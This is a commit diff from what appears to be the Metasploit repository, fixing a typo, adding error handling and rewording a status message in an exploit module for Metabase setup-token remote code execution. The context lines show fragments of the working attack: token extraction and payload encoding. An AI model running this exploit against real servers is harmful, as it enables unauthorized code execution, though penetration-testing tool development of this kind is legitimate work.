review comments

h00die · Aug 8, 2023 · ef7e81a · ef7e81a
1 parent 507a245
commit ef7e81a
Showing 1 changed file with 5 additions and 5 deletions.
diff --git a/modules/exploits/linux/http/metabase_setup_token_rce.rb b/modules/exploits/linux/http/metabase_setup_token_rce.rb
@@ -62,11 +62,11 @@ def initialize(info = {})
     )
   end
 
-  def get_boostrab_json_blob_from_html_resp(html)
+  def get_bootstrap_json_blob_from_html_resp(html)
     %r{<script type="application/json" id="_metabaseBootstrap">([^>]+)</script>} =~ html
     begin
       JSON.parse(Regexp.last_match(1))
-    rescue JSON::ParserError
+    rescue JSON::ParserError, TypeError
       print_bad('Unable to parse JSON blob')
       nil
     end
@@ -81,7 +81,7 @@ def check
     return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
     return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
 
-    json = get_boostrab_json_blob_from_html_resp(res.body)
+    json = get_bootstrap_json_blob_from_html_resp(res.body)
     fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response, unable to load JSON blob") if json.nil?
     version = json.dig('version', 'tag')
     return CheckCode::Unknown("#{peer} - Unable to determine version from JSON blob") if version.nil?
@@ -103,7 +103,7 @@ def exploit
     )
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
     fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
-    json = get_boostrab_json_blob_from_html_resp(res.body)
+    json = get_bootstrap_json_blob_from_html_resp(res.body)
     fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response, unable to load JSON blob") if json.nil?
     setup_token = json['setup-token']
     if setup_token.nil?
@@ -121,7 +121,7 @@ def exploit
     fail_with(Failure::UnexpectedReply, "#{peer} - Unable to find valid setup-token") if setup_token.nil?
     print_good("Found setup token: #{setup_token}")
 
-    print_status('Sending exploit')
+    print_status('Sending exploit (may take a few seconds)')
     # our base64ed payload can't have = in it, so we'll pad out with spaces to remove them
     b64_pe = ::Base64.strict_encode64(payload.encoded)
     equals_count = b64_pe.count('=')